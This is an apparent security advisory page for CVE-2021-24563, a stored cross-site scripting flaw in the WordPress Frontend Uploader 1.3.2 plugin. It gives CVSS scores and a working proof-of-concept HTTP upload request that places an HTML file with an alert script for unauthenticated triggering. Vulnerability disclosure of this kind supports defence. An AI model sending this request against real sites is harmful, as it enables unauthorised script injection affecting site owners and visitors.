WordPress Frontend Uploader 1.3.2 Cross Site Scripting

2022.01.13
Credit: Veshraj Ghimire
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2021-24563
CWE: CWE-79
CWE-264


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated) # Date: 10/01/2022 # Exploit Author: Veshraj Ghimire # Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/ # Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/ # Version: 1.3.2 # Tested on: Windows 10 - Chrome, WordPress 5.8.2 # CVE : CVE-2021-24563 # References: https://www.youtube.com/watch?v=lfrLoHl4-Zs https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1 # Description: The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly # Proof Of Concept: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654 Content-Length: 1396 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_ID" 1247 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_title" test -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="post_content" test -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="files[]"; filename="xss.html" Content-Type: text/html <script>alert(/XSS/)</script> -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="action" upload_ugc -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="form_layout" image -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="fu_nonce" 021fb612f9 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="_wp_http_referer" /wordpress/frontend-uploader-form/ -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="ff" 92b6cbfa6120e13ff1654e28cef2a271 -----------------------------124662954015823207281179831654 Content-Disposition: form-data; name="form_post_id" 1247 -----------------------------124662954015823207281179831654-- Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top